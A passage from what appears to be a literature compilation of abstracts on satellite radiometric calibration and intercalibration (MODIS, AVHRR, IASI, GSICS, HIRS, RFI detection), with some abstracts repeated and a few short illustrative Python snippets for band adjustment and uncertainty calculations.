Overall, if spectral band difference effects (SBDEs) are not taken into account, the Railroad Valley Playa site is a “good” ground target for cross calibration between most but not all satellite sensors in most but not all spectral regions investigated. “Good” is defined as SBDEs within ± 3%. The other three ground target types considered (snow, sand and rangeland) proved to be more sensitive to uncorrected SBDEs than the RVPN site overall. The spectral characteristics of the scene content (solar irradiance, surface reflectance and atmosphere) are examined in detail to clarify why spectral difference effects arise and why they can be significant when comparing different imaging sensor systems. Atmospheric gas absorption features are identified as being the main source of spectral variability in most spectral regions. The paper concludes with recommendations on spectral data and tools that would facilitate cross-calibration between multiple satellite sensors. --- paper_title: Targets, methods, and sites for assessing the in-flight spatial resolution of electro-optical data products paper_content: The spatial resolution of a digital, electro-optical remote sensing imaging system or product is an important image quality characteristic that helps determine the utility of an imaging source. Although spatial resolution is often described by a single image quality parameter, the ground sample distance, there are several other parameters that affect image sharpness and need to be considered. These other parameters are associated with the point-spread function, signal-to-noise ratio, and dynamic range of the image product. This review paper covers the various approaches to in-flight measurement of spatial resolution parameters, including ground sample distance, point spread function, optical transfer function, modulation transfer function, far field response, and edge response and their significance, as well as target types and methods to determine these spatial resolution parameters. To this end, the paper lists and describes various targets found across the world, as well as astronomical ones. These tar... --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. 
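The SBAF and spectral-band-difference entries above compensate relative spectral response (RSR) mismatches by convolving a hyperspectral target spectrum with each sensor's RSR and forming a band-adjustment ratio. The sketch below illustrates that computation under one common convention (reference-to-monitored ratio); the target spectrum, the Gaussian RSRs, and the example measured reflectance are synthetic assumptions, not the cited papers' data or exact formulation.

```python
import numpy as np

def band_reflectance(wavelength_um, target_spectrum, rsr):
    """Band-averaged reflectance simulated by weighting a hyperspectral target
    spectrum with a sensor's relative spectral response (RSR)."""
    return np.trapz(target_spectrum * rsr, wavelength_um) / np.trapz(rsr, wavelength_um)

def spectral_band_adjustment_factor(wavelength_um, target_spectrum, rsr_reference, rsr_monitored):
    """Ratio of the reflectance simulated for the reference sensor's band to
    that simulated for the monitored sensor's band, over the same target
    spectrum.  Multiplying the monitored sensor's measured reflectance by this
    factor compensates the RSR mismatch (one common sign convention)."""
    return (band_reflectance(wavelength_um, target_spectrum, rsr_reference) /
            band_reflectance(wavelength_um, target_spectrum, rsr_monitored))

# Entirely synthetic inputs for illustration: a smooth ramp-like target
# spectrum and two Gaussian RSRs with slightly different centres and widths.
wl = np.linspace(0.55, 0.75, 401)                          # wavelength, micrometres
target = 0.20 + 0.60 * (wl - 0.55) / 0.20                  # target reflectance spectrum
rsr_ref = np.exp(-0.5 * ((wl - 0.660) / 0.020) ** 2)       # "reference" band RSR
rsr_mon = np.exp(-0.5 * ((wl - 0.645) / 0.025) ** 2)       # "monitored" band RSR
sbaf = spectral_band_adjustment_factor(wl, target, rsr_ref, rsr_mon)
adjusted = 0.45 * sbaf                                     # 0.45: example measured reflectance
```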
--- paper_title: Assessing the consistency of AVHRR and MODIS L1B reflectance for generating Fundamental Climate Data Records paper_content: [1] Satellite detection of the global climate change signals as small as a few percent per decade in albedo critically depends on consistent and accurately calibrated Level 1B (L1B) data or Fundamental Climate Data Records (FCDRs). Detecting small changes in signal over decades is a major challenge not only to the retrieval of geophysical parameters from satellite observations, but more importantly to the current state-of-the-art calibration, since such small changes can easily be obscured by erroneous variations in the calibration, especially for instruments with no onboard calibration, such as the Advanced Very High Resolution Radiometer (AVHRR). Without dependable FCDRs, its derivative Thematic Climate Data Records (TCDRs) are bound to produce false trends with questionable scientific value. This has been increasingly recognized by more and more remote sensing scientists. In this study we analyzed the consistency of calibrated reflectance from the operational L1B data between AVHRR on NOAA-16 and -17 and between NOAA-16/AVHRR and Aqua/MODIS, based on Simultaneous Nadir Overpass (SNO) observation time series. Analyses suggest that the NOAA-16 and -17/AVHRR operationally calibrated reflectance became consistent two years after the launch of NOAA-17, although they still differ by 9% from the MODIS reflectance for the 0.63 μm band. This study also suggests that the SNO method has reached a high level of relative accuracy (∼1.5%) for estimating the consistency for both the 0.63 and 0.84 μm bands between AVHRRs, and a 0.9% relative accuracy between AVHRR and MODIS for the 0.63 μm band. It is believed that the methodology is applicable to all historical AVHRR data for improving the calibration consistency, and work is in progress generating FCDRs from the nearly 30 years of AVHRR data using the SNO and other complimentary methods. A more consistent historical AVHRR L1B data set will be produced for a variety of geophysical products including aerosol, vegetation, cloud, and surface albedo to support global climate change detection studies. --- paper_title: An Evaluation of the Uncertainty of the GSICS SEVIRI-IASI Intercalibration Products paper_content: Global Space-based Inter-Calibration System (GSICS) products to correct the calibration of the infrared channels of the Meteosat/SEVIRI (Spinning Enhanced Visible and Infrared Imager) geostationary imagers are based on comparisons of collocated observations with Metop/IASI (Infrared Atmospheric Sounding Interferometer) as a reference instrument. Each step of the cross-calibration algorithm is analyzed to produce a comprehensive error budget, following the Guide to the Expression of Uncertainty in Measurement. This paper aims to validate the quality indicators provided as uncertainty estimates with the GSICS correction. The methodology presented provides a framework to allow quantitative tradeoffs between the collocation criteria and the number of collocations generated to recommend further algorithm improvements. It is shown that random errors dominate systematic ones and that combined standard uncertainties (with coverage factor k = 1) in the corrected brightness temperatures are ~ 0.01 K for typical clear sky conditions but increase rapidly for low radiances - by more than one order of magnitude for 210 K scenes, corresponding to cold cloud tops. 
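The SEVIRI-IASI uncertainty entry above reports combined standard uncertainties that are small for warm clear-sky scenes but grow rapidly toward cold cloud tops, since corrected values far from the bulk of the collocations rely on extrapolating the regression. As a hedged illustration of that behaviour, the sketch below propagates a regression-coefficient covariance matrix to the corrected brightness temperature; the covariance values are hypothetical placeholders, not the paper's actual error budget.

```python
import numpy as np

def corrected_tb_uncertainty(tb, coeff_cov, scene_var=0.0):
    """Standard uncertainty (coverage factor k = 1) of a corrected brightness
    temperature offset + slope * Tb, propagated from the 2x2 covariance matrix
    of the regression coefficients plus an optional scene-dependent term."""
    tb = np.asarray(tb, dtype=float)
    variance = (coeff_cov[0, 0]                # var(offset)
                + 2.0 * tb * coeff_cov[0, 1]   # 2 * Tb * cov(offset, slope)
                + tb ** 2 * coeff_cov[1, 1]    # Tb^2 * var(slope)
                + scene_var)
    return np.sqrt(variance)

# Hypothetical coefficient covariance from a fit whose collocations cluster
# around warm (~285 K) clear-sky scenes; the numbers are placeholders only.
coeff_cov = np.array([[6.4e-1, -2.2e-3],
                      [-2.2e-3, 7.6e-6]])
u_clear_sky = corrected_tb_uncertainty(285.0, coeff_cov)    # small near the data
u_cold_cloud = corrected_tb_uncertainty(210.0, coeff_cov)   # grows for cold scenes
```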
--- paper_title: Microwave Radiometer Radio-Frequency Interference Detection Algorithms: A Comparative Study paper_content: Two algorithms used in microwave radiometry for radio-frequency interference (RFI) detection and mitigation are the pulse detection algorithm and the kurtosis detection algorithm. The relative performance of the algorithms is compared both analytically and empirically. Their probabilities of false alarm under RFI-free conditions and of detection when RFI is present are examined. The downlink data rate required to implement each algorithm in a spaceborne application is also considered. The kurtosis algorithm is compared to a pulse detection algorithm operating under optimal RFI detection conditions. The performance of both algorithms is also analyzed as a function of varying characteristics of the RFI. The RFI detection probabilities of both algorithms under varying subsampling conditions are compared and validated using data obtained from a field campaign. Implementation details, resource usage, and postprocessing requirements are also addressed for both algorithms. --- paper_title: An Evaluation of the Uncertainty of the GSICS SEVIRI-IASI Intercalibration Products paper_content: Global Space-based Inter-Calibration System (GSICS) products to correct the calibration of the infrared channels of the Meteosat/SEVIRI (Spinning Enhanced Visible and Infrared Imager) geostationary imagers are based on comparisons of collocated observations with Metop/IASI (Infrared Atmospheric Sounding Interferometer) as a reference instrument. Each step of the cross-calibration algorithm is analyzed to produce a comprehensive error budget, following the Guide to the Expression of Uncertainty in Measurement. This paper aims to validate the quality indicators provided as uncertainty estimates with the GSICS correction. The methodology presented provides a framework to allow quantitative tradeoffs between the collocation criteria and the number of collocations generated to recommend further algorithm improvements. It is shown that random errors dominate systematic ones and that combined standard uncertainties (with coverage factor k = 1) in the corrected brightness temperatures are ~ 0.01 K for typical clear sky conditions but increase rapidly for low radiances - by more than one order of magnitude for 210 K scenes, corresponding to cold cloud tops. --- paper_title: Assessment of Spectral, Misregistration, and Spatial Uncertainties Inherent in the Cross-Calibration Study paper_content: Cross-calibration of satellite sensors permits the quantitative comparison of measurements obtained from different Earth Observing (EO) systems. Cross-calibration studies usually use simultaneous or near-simultaneous observations from several spaceborne sensors to develop band-by-band relationships through regression analysis. The investigation described in this paper focuses on evaluation of the uncertainties inherent in the cross-calibration process, including contributions due to different spectral responses, spectral resolution, spectral filter shift, geometric misregistrations, and spatial resolutions. The hyperspectral data from the Environmental Satellite SCanning Imaging Absorption SpectroMeter for Atmospheric CartograpHY and the EO-1 Hyperion, along with the relative spectral responses (RSRs) from the Landsat 7 Enhanced Thematic Mapper (TM) Plus and the Terra Moderate Resolution Imaging Spectroradiometer sensors, were used for the spectral uncertainty study. 
The data from Landsat 5 TM over five representative land cover types (desert, rangeland, grassland, deciduous forest, and coniferous forest) were used for the geometric misregistrations and spatial-resolution study. The spectral resolution uncertainty was found to be within 0.25%, spectral filter shift within 2.5%, geometric misregistrations within 0.35%, and spatial-resolution effects within 0.1% for the Libya 4 site. The one-sigma uncertainties presented in this paper are uncorrelated, and therefore, the uncertainties can be summed orthogonally. Furthermore, an overall total uncertainty was developed. In general, the results suggested that the spectral uncertainty is more dominant compared to other uncertainties presented in this paper. Therefore, the effect of the sensor RSR differences needs to be quantified and compensated to avoid large uncertainties in cross-calibration results. --- paper_title: Inversion algorithm for estimating radio frequency interference characteristics based on kurtosis measurements paper_content: An inversion algorithm is developed to recover power and duty-cycle of incoming Radio Frequency Interference (RFI) signals from kurtosis. The algorithm applies simulated annealing on multiple kurtosis values obtained from different radiometer integration periods. The paper evaluates the performance of the inversion algorithm by performing Monte-Carlo simulations to obtain error statistics. The inversion capability of the algorithm and its robustness against the 50% duty-cycle blind-spot (generally present for the kurtosis detection algorithm) is demonstrated using experimental data. --- paper_title: Intersatellite Differences of HIRS Longwave Channels Between NOAA-14 and NOAA-15 and Between NOAA-17 and METOP-A paper_content: Intersatellite differences of the High-Resolution Infrared Radiation Sounder (HIRS) longwave channels (channels 1-12) between National Oceanic and Atmospheric Administration 14 (NOAA-14) and NOAA-15 and between NOAA-17 and METOP-A are examined. Two sets of colocated data are incorporated in the examination. One data set is obtained during periods when equator crossing times of two satellites are very close to each other, and the data set is referred to as global simultaneous nadir overpass observation (SNO). The other data set is based on multiyear polar SNOs. The examination shows that intersatellite differences (ISDs) of temperature-sounding channels from lower stratosphere to lower troposphere, i.e., channels 3-7, are correlated with their corresponding lapse rate factors. Many of the channels also vary with respect to channel brightness temperatures; however, for the upper tropospheric temperature channel (channel 4), the patterns of ISDs from low latitudes and high latitudes are very different due to the fact that the latitudinal variation of brightness temperature does not necessarily follow the latitudinal variation of the temperature lapse rate. The differences between observations in low latitudes and high latitudes form “fork” patterns in scatter plots of ISDs with respect to brightness temperatures. A comparison of ISDs derived from short-term global SNOs and those derived from multiyear polar SNOs reveals the advantage and the limitation of the two data sets. The multiyear polar SNO generally provides larger observation ranges of brightness temperatures in channels 1-4. 
The global SNO extends the brightness temperature observations to the warm sides for channels 5-12 and captures the occurrences of larger ISDs for most longwave channels. --- paper_title: GSICS Inter-Calibration of Infrared Channels of Geostationary Imagers Using Metop/IASI paper_content: The first products of the Global Space-based Inter-Calibration System (GSICS) include bias monitoring and calibration corrections for the thermal infrared (IR) channels of current meteorological sensors on geostationary satellites. These use the hyperspectral Infrared Atmospheric Sounding Interferometer (IASI) on the low Earth orbit (LEO) Metop satellite as a common cross-calibration reference. This paper describes the algorithm, which uses a weighted linear regression, to compare collocated radiances observed from each pair of geostationary-LEO instruments. The regression coefficients define the GSICS Correction, and their uncertainties provide quality indicators, ensuring traceability to the selected community reference, IASI. Examples are given for the Meteosat, GOES, MTSAT, Fengyun-2, and COMS imagers. Some channels of these instruments show biases that vary with time due to variations in the thermal environment, stray light, and optical contamination. These results demonstrate how inter-calibration can be a powerful tool to monitor and correct biases, and help diagnose their root causes. --- paper_title: Accurate radiometry from space: an essential tool for climate studies paper_content: The Earth’s climate is undoubtedly changing; however, the time scale, consequences and causal attribution remain the subject of significant debate and uncertainty. Detection of subtle indicators from a background of natural variability requires measurements over a time base of decades. This places severe demands on the instrumentation used, requiring measurements of sufficient accuracy and sensitivity that can allow reliable judgements to be made decades apart. The International System of Units (SI) and the network of National Metrology Institutes were developed to address such requirements. However, ensuring and maintaining SI traceability of sufficient accuracy in instruments orbiting the Earth presents a significant new challenge to the metrology community. This paper highlights some key measurands and applications driving the uncertainty demand of the climate community in the solar reflective domain, e.g. solar irradiances and reflectances/radiances of the Earth. It discusses how meeting these uncertainties facilitate significant improvement in the forecasting abilities of climate models. After discussing the current state of the art, it describes a new satellite mission, called TRUTHS, which enables, for the first time, high-accuracy SI traceability to be established in orbit. The direct use of a ‘primary standard’ and replication of the terrestrial traceability chain extends the SI into space, in effect realizing a ‘metrology laboratory in space’. --- paper_title: Consistency assessment of Atmospheric Infrared Sounder and Infrared Atmospheric Sounding Interferometer radiances: Double differences versus simultaneous nadir overpasses paper_content: [1] Quantifying the radiometric difference and creating a calibration link between Atmospheric Infrared Sounder (AIRS) on Aqua and Infrared Atmospheric Sounding Interferometer (IASI) on MetOp are crucial for creating fundamental climate data records and intercalibrating other narrowband or broadband satellite instruments. 
This study employs two different methods to assess the AIRS and IASI radiance consistency within the four Geostationary Operational Environmental Satellite (GOES) imager infrared channels (with central wavelengths at 6.7, 10.7, 12.0, and 13.3 μm) through a period of 2 years and 9 months. The first method employs the differences of AIRS and IASI relative to the GOES observations sampled in the tropics to indirectly track the AIRS and IASI radiance differences. The second approach directly compares AIRS and IASI in the polar regions through the simultaneous nadir overpass observations. Both methods reveal that AIRS and IASI radiances are in good agreement with each other both in the tropics and in the polar regions within GOES imager channels used in this study, while AIRS is found to be slightly warmer than IASI by less than 0.1 K. --- paper_title: On-Orbit Calibration and Performance of Aqua MODIS Reflective Solar Bands paper_content: Aqua MODIS has successfully operated on-orbit for more than six years since its launch in May 2002, continuously making global observations and improving studies of changes in the Earth's climate and environment. Twenty of the 36 MODIS spectral bands, covering wavelengths from 0.41 to 2.2 μm, are the reflective solar bands (RSBs). They are calibrated on-orbit using an onboard solar diffuser (SD) and an SD stability monitor. In addition, regularly scheduled lunar observations are made to track the RSB calibration stability. This paper presents Aqua MODIS RSB on-orbit calibration and characterization activities, methodologies, and performance. Included in this paper are characterizations of detector signal-to-noise ratio, short-term stability, and long-term response change. Spectral-wavelength-dependent degradation of the SD bidirectional reflectance factor and scan mirror reflectance, which also varies with the angle of incidence, is examined. On-orbit results show that Aqua MODIS onboard calibrators have performed well, enabling accurate calibration coefficients to be derived and updated for the Level 1B production and assuring high-quality science data products to be continuously generated and distributed. Since launch, the short-term response, on a scan-by-scan basis, has remained extremely stable for most RSB detectors. With the exception of band 6, there have been no new RSB noisy or inoperable detectors. Like its predecessor, i.e., Terra MODIS, launched in December 1999, the Aqua MODIS visible spectral bands have experienced relatively large changes, with an annual response decrease (mirror side 1) of 3.6% for band 8 at 0.412 μm, 2.3% for band 9 at 0.443 μm, 1.6% for band 3 at 0.469 μm, and 1.2% for band 10 at 0.488 μm. For other RSB bands with wavelengths greater than 0.5 μm, the annual response changes are typically less than 0.5%. In general, Aqua MODIS optics degradation is smaller than Terra MODIS, and the mirror-side differences are much smaller. Overall, Aqua MODIS RSB on-orbit performance is better than that of Terra MODIS. --- paper_title: Diurnal and Scan Angle Variations in the Calibration of GOES Imager Infrared Channels paper_content: The current Geostationary Operational Environmental Satellite (GOES) Imager infrared (IR) channels experience a midnight effect that can result in erroneous instrument responsivity around satellite midnight. An empirical method named the Midnight Blackbody Calibration Correction (MBCC) was developed and implemented in the GOES Imager IR operational calibration, aiming to correct the midnight calibration errors.
The main objective of this study is to evaluate the MBCC performance for the GOES-11/-12 Imager IR channels by examining the diurnal variation of the mean brightness temperature (Tb) bias with respect to reference instruments. Two well-calibrated hyperspectral radiometers on low Earth orbits (LEOs), the Atmospheric Infrared Sounder on the Aqua satellite and the Infrared Atmospheric Sounding Interferometer (IASI) on the Metop-A satellite, are used as the reference instruments in this study. However, as the timing of the collocated geostationary-LEO intercalibration data is related to the GOES scan angle, it is then necessary to assess the GOES scan angle calibration variations, which becomes the second objective of this study. Our results show that the applications and performance of the MBCC method varies greatly between the different channels and different times. While it is usually applied with high frequency for about 8 h around satellite midnight for the short-wave channels (Ch2), it may only be intensively used right after satellite midnight or even barely used for the other IR channels. The MBCC method, if applied with high frequency, can reduce the mean day/night calibration difference to less than 0.15 K in almost all the GOES IR channels studied in this paper except for Ch4 (10.7 μm). The uncertainty of the nighttime GOES and IASI Tb difference for different scan angles is less than 0.1 K in each IR channel, indicating that there is no apparent systematic variation with the scan angle, and therefore, the estimated diurnal cycles of GOES Imager calibration is not prone to the systematic effects due to scan angle. --- paper_title: Overview of NASA Earth Observing Systems Terra and Aqua moderate resolution imaging spectroradiometer instrument calibration algorithms and on-orbit performance paper_content: Since launch, Terra and Aqua MODIS have successfully operated on-orbit for more than 9 and 6.5 years, respectively. MODIS, a key instrument for the NASA's EOS missions, was designed to make continuous observations for studies of Earth's land, ocean, and atmospheric properties and to extend existing data records from heritage earth-observing sensors. In addition to frequent global coverage, MODIS observations are made in 36 spectral bands, covering both solar reflective and thermal emissive spectral regions. Nearly 40 data products are routinely generated from MODIS observations and publicly distributed for a broad range of applications. Both instruments have produced an unprecedented amount of data in support of the science community. As a general reference for understanding sensor operation and calibration, and thus science data quality, this paper provides an overview of the MODIS instruments and their pre-launch calibration and characterization, and describes their on-orbit calibration algorithms and performance. On-orbit results from both Terra and Aqua MODIS radiometric, spectral, and spatial calibration are discussed. Currently, both instruments, including their on-board calibration devices, are healthy and are expected to continue operation for several years to come. --- paper_title: Terra and Aqua MODIS inter-comparison of three reflective solar bands using AVHRR onboard the NOAA-KLM satellites paper_content: Cross-sensor inter-comparison is important to assess calibration quality and consistency and ensure continuity of observational datasets. 
This study conducts an inter-comparison of Terra and Aqua MODIS (the MODerate Resolution Imaging Spectroradiometer) to examine the overall calibration consistency of the reflective solar bands. Observations obtained from AVHRR (the Advanced Very High Resolution Radiometer) onboard the NOAA-KLM series of satellites are used as a transfer radiometer to examine three MODIS bands at 0.65 (visible), 0.85 (near-IR) and 1.64 µm (far near-IR) that match spectrally with AVHRR channels. Coincident events are sampled at a frequency of about once per month with each containing at least 3000 pixel-by-pixel matched data points. Multiple AVHRR sensors on-board NOAA-15 to 18 satellites are used to check the repeatability of the Terra/Aqua MODIS inter-comparison results. The same approach applied in previous studies is used with defined criteria to generate coincident and co-located near nadir MODIS and AVHRR pixel pairs matched in footprint. Terra and Aqua MODIS to AVHRR reflectance ratios are derived from matched pixel pairs with the same AVHRR used as a transfer radiometer. The ratio differences between Terra and Aqua MODIS/AVHRR give an indication of the calibration biases between the two MODIS instruments. Effects due to pixel footprint mismatch, band spectral differences and surface and atmospheric bi-directional reflectance distributions (BRDFs) are discussed. Trending results from 2002 to 2006 show that Terra and Aqua MODIS reflectances agree with each other within 2% for the three reflective solar bands. --- paper_title: Assessing the consistency of AVHRR and MODIS L1B reflectance for generating Fundamental Climate Data Records paper_content: [1] Satellite detection of the global climate change signals as small as a few percent per decade in albedo critically depends on consistent and accurately calibrated Level 1B (L1B) data or Fundamental Climate Data Records (FCDRs). Detecting small changes in signal over decades is a major challenge not only to the retrieval of geophysical parameters from satellite observations, but more importantly to the current state-of-the-art calibration, since such small changes can easily be obscured by erroneous variations in the calibration, especially for instruments with no onboard calibration, such as the Advanced Very High Resolution Radiometer (AVHRR). Without dependable FCDRs, its derivative Thematic Climate Data Records (TCDRs) are bound to produce false trends with questionable scientific value. This has been increasingly recognized by more and more remote sensing scientists. In this study we analyzed the consistency of calibrated reflectance from the operational L1B data between AVHRR on NOAA-16 and -17 and between NOAA-16/AVHRR and Aqua/MODIS, based on Simultaneous Nadir Overpass (SNO) observation time series. Analyses suggest that the NOAA-16 and -17/AVHRR operationally calibrated reflectance became consistent two years after the launch of NOAA-17, although they still differ by 9% from the MODIS reflectance for the 0.63 μm band. This study also suggests that the SNO method has reached a high level of relative accuracy (∼1.5%) for estimating the consistency for both the 0.63 and 0.84 μm bands between AVHRRs, and a 0.9% relative accuracy between AVHRR and MODIS for the 0.63 μm band. It is believed that the methodology is applicable to all historical AVHRR data for improving the calibration consistency, and work is in progress generating FCDRs from the nearly 30 years of AVHRR data using the SNO and other complimentary methods. 
A more consistent historical AVHRR L1B data set will be produced for a variety of geophysical products including aerosol, vegetation, cloud, and surface albedo to support global climate change detection studies. --- paper_title: An Extended and Improved Special Sensor Microwave Imager (SSM/I) Period of Record paper_content: Abstract The National Oceanic and Atmospheric Administration National Climatic Data Center has served as the archive of the Defense Meteorological Satellite Program Special Sensor Microwave Imager (SSM/I) data from the F-8, F-10, F-11, F-13, F-14, and F-15 platforms covering the period from July 1987 to the present. Passive microwave satellite measurements from SSM/I have been used to generate climate products in support of national and international programs. The SSM/I temperature data record (TDR) and sensor data record (SDR) datasets have been reprocessed and stored as network Common Data Form (netCDF) 3-hourly files. In addition to reformatting the data, a normalized anomaly (z score) for each footprint temperature value was calculated by subtracting each radiance value with the corresponding monthly 1° grid climatological mean and dividing it by the associated climatological standard deviation. Threshold checks were also used to detect radiance, temporal, and geolocation values that were outside the ... --- paper_title: Three decades of intersatellite‐calibrated High‐Resolution Infrared Radiation Sounder upper tropospheric water vapor paper_content: [1] To generate a climatologically homogenized time series of the upper tropospheric water vapor (UTWV), intersatellite calibration is carried out for 3 decades of High-Resolution Infrared Radiation Sounder (HIRS) channel 12 clear-sky measurements. Because of the independence of the individual satellite's instrument calibration, intersatellite biases exist from satellite to satellite. To minimize the expected intersatellite biases, measurement adjustments are derived from overlapping HIRS data from the equator to the poles to account for the large global temperature observation range. Examination of the intersatellite biases shows that the biases are scene temperature–dependent. Many overlapping satellites have bias variations of more than 0.5 K across the scene temperature ranges. An algorithm is developed to account for the varying biases with respect to brightness temperature. Analyses based on the intercalibrated data show that selected regions of UTWV are highly correlated with low-frequency indexes such as the Pacific Decadal Oscillation index and the Pacific and North America index, especially in the winter months. The derived upper tropospheric humidity in the central Pacific also corresponds well with the Nino 3.4 index. Thirty year trend analysis indicates an increase of upper tropospheric humidity in the equatorial tropics. The areal coverage of both high and low humidity values also increased over time. These features suggest the possibility of enhanced convective activity in the tropics. --- paper_title: Construction of the RSS V3.2 Lower-Tropospheric Temperature Dataset from the MSU and AMSU Microwave Sounders paper_content: Abstract Measurements made by microwave sounding instruments provide a multidecadal record of atmospheric temperature in several thick atmospheric layers. 
Satellite measurements began in late 1978 with the launch of the first Microwave Sounding Unit (MSU) and have continued to the present via the use of measurements from the follow-on series of instruments, the Advanced Microwave Sounding Unit (AMSU). The weighting function for MSU channel 2 is centered in the middle troposphere but contains significant weight in the lower stratosphere. To obtain an estimate of tropospheric temperature change that is free from stratospheric effects, a weighted average of MSU channel 2 measurements made at different local zenith angles is used to extrapolate the measurements toward the surface, which results in a measurement of changes in the lower troposphere. In this paper, a description is provided of methods that were used to extend the MSU method to the newer AMSU channel 5 measurements and to intercalibrate the resul... --- paper_title: Prime candidate Earth targets for the post-launch radiometric calibration of space-based optical imaging instruments paper_content: This paper provides a comprehensive list of prime candidate terrestrial targets for consideration as benchmark sites for the post-launch radiometric calibration of space-based instruments. The key characteristics of suitable sites are outlined primarily with respect to selection criteria, spatial uniformity, and temporal stability. The establishment and utilization of such benchmark sites is considered an important element of the radiometric traceability of satellite image data products for use in the accurate monitoring of environmental change. --- paper_title: IASI spectral radiance validation inter-comparisons : case study assessment from the JAIVEx field campaign paper_content: Advanced satellite sensors are tasked with improving global-scale measurements of the Earth's atmosphere, clouds, and surface to enable enhancements in weather prediction, climate monitoring, and environmental change detection. Measurement system validation is crucial to achieving this goal and maximizing research and operational utility of resultant data. Field campaigns employing satellite under-flights with well-calibrated Fourier Transform Spectrometer (FTS) sensors aboard high-altitude aircraft are an essential part of this validation task. The National Polar-orbiting Operational Environmental Satellite System (NPOESS) Airborne Sounder Testbed-Interferometer (NAST-I) has been a fundamental contributor in this area by providing coincident high spectral and spatial resolution observations of infrared spectral radiances along with independently-retrieved geophysical products for comparison with like products from satellite sensors being validated. This manuscript focuses on validating infrared spectral radiance from the Infrared Atmospheric Sounding Interferometer (IASI) through a case study analysis using data obtained during the recent Joint Airborne IASI Validation Experiment (JAIVEx) field campaign. Emphasis is placed upon the benefits achievable from employing airborne interferometers such as the NAST-I since, in addition to IASI radiance calibration performance assessments, cross-validation with other advanced sounders such as the AQUA Atmospheric InfraRed Sounder (AIRS) is enabled. 
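A minimal Python sketch of the normalized-anomaly (z-score) screening described in the SSM/I data-record entry above; the function name, array shapes, and the 5-sigma threshold in the usage example are illustrative assumptions, not part of the original reprocessing code.

    import numpy as np

    def footprint_z_scores(tb, clim_mean, clim_std):
        """Normalized anomaly for each footprint brightness temperature (K).

        clim_mean and clim_std are the monthly 1-degree-grid climatological mean
        and standard deviation matched to each footprint."""
        tb = np.asarray(tb, dtype=float)
        return (tb - np.asarray(clim_mean, dtype=float)) / np.asarray(clim_std, dtype=float)

    # Hypothetical usage: flag footprints whose anomaly magnitude exceeds 5 sigma.
    z = footprint_z_scores([215.3, 240.1, 301.7], [214.8, 239.5, 241.0], [1.2, 1.5, 1.4])
    suspect = np.abs(z) > 5.0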
--- paper_title: Monitoring of IR Clear-Sky Radiances over Oceans for SST (MICROS) paper_content: Monitoring of IR Clear-sky Radiances over Oceans for SST (MICROS, www.star.nesdis.noaa.gov/sod/sst/micros/) is a web-based tool used to monitor the Model minus Observation (M-O) biases in clear-sky brightness temperatures (BT) over oceans, produced by the newly developed Advanced Clear-Sky Processor for Oceans (ACSPO). ACSPO version 1.0 became operational in May 2008 with AVHRR Global Area Coverage data from NOAA-18 and MetOp-A. Currently, it generates clear-sky radiances (CSR), sea surface temperature (SST), and aerosol products from four platforms including NOAA-16 and -17, which are also processed for cross-platform checks. The central part of ACSPO is the fast Community Radiative Transfer Model (CRTM), which is used in conjunction with Reynolds SST and Global Forecast System (GFS) upper-air data to simulate clear-sky BTs in AVHRR Ch3B (3.7 μm), 4 (11 μm), and 5 (12 μm). CRTM clear-sky BTs are reported on ACSPO product granules alongside with AVHRR measured clear-sky BTs. Currently, MICROS performs three functions in near-real time: it runs ACSPO processing for four platforms, performs statistical analyses of the M-O biases, and publishes summary results on the web. This paper documents the MICROS system and discusses effects of three ACSPO versions on the stability of the global M-O bias. The upgrades did not significantly affect mean M-O biases, but their standard deviations (STD) have significantly improved. Double-differencing technique is employed to check clear-sky radiances over ocean for cross-platform consistency. All analyses show that NOAA-16 radiances are highly unstable in all three bands. This satellite currently flies close to the terminator. Also, its AVHRR sensor has been unstable since September 2003. Radiances from the three other platforms are generally stable and cross-platform consistent to within 0.01-0.04 K, except for NOAA-18 Ch4 which shows a ~-0.11 K bias relative to NOAA-17 and ~-0.07 K bias relative to MetOp-A. Work is underway to extend MICROS functionality to include monitoring of clear-sky BTs from MSG/SEVIRI. NPOESS/VIIRS and GOES-R/ABI data will also be added to MICROS once these sensors are in orbit. For accurate physical (CRTM-based) SST retrievals, biases in AVHRR BTs should be fully understood and minimized. Improvements to daytime CRTM modeling are also underway. --- paper_title: Online catalog of world-wide test sites for the post-launch characterization and calibration of optical sensors paper_content: In an era when the number of Earth-observing satellites is rapidly growing and measurements from these sensors are used to answer increasingly urgent global issues, it is imperative that scientists and decision-makers can rely on the accuracy of Earth-observing data products. The characterization and calibration of these sensors are vital to achieve an integrated Global Earth Observation System of Systems (GEOSS) for coordinated and sustained observations of Earth. The U.S. Geological Survey (USGS), as a supporting member of the Committee on Earth Observation Satellites (CEOS) and GEOSS, is working with partners around the world to establish an online catalog of prime candidate test sites for the post-launch characterization and calibration of space-based optical imaging sensors. The online catalog provides easy public Web site access to this vital information for the global community. 
This paper describes the catalog, the test sites, and the methodologies to use the test sites. It also provides information regarding access to the online catalog and plans for further development of the catalog in cooperation with calibration specialists from agencies and organizations around the world. Through greater access to and understanding of these vital test sites and their use, the validity and utility of information gained from Earth remote sensing will continue to improve. --- paper_title: Monitoring Satellite Radiance Biases Using NWP Models paper_content: Radiances measured by satellite radiometers are often subject to biases due to limitations in their radiometric calibration. In support of the Global Space-based Inter-Calibration System project, to improve the quality of calibrated radiances from atmospheric sounders and imaging radiometers, an activity is underway to compare routinely measured radiances with those simulated from operational global numerical weather prediction (NWP) fields. This paper describes the results obtained from the first three years of these comparisons. Data from the High-resolution Infrared Radiation Sounder, Spinning Enhanced Visible and Infrared Imager, Advanced Along-Track Scanning Radiometer, Advanced Microwave Sounding Unit, and Microwave Humidity Sounder radiometers, together with the Atmospheric Infrared Sounder, a spectrometer, and the Infrared Atmospheric Sounding Interferometer, an interferometer, were included in the analysis. Changes in mean biases and their standard deviations were used to investigate the temporal stability of the bias and radiometric noise of the instruments. A double difference technique can be employed to remove the effect of changes or deficiencies in the NWP model which can contribute to the biases. The variation of the biases with other variables is also investigated, such as scene temperature, scan angle, location, and time of 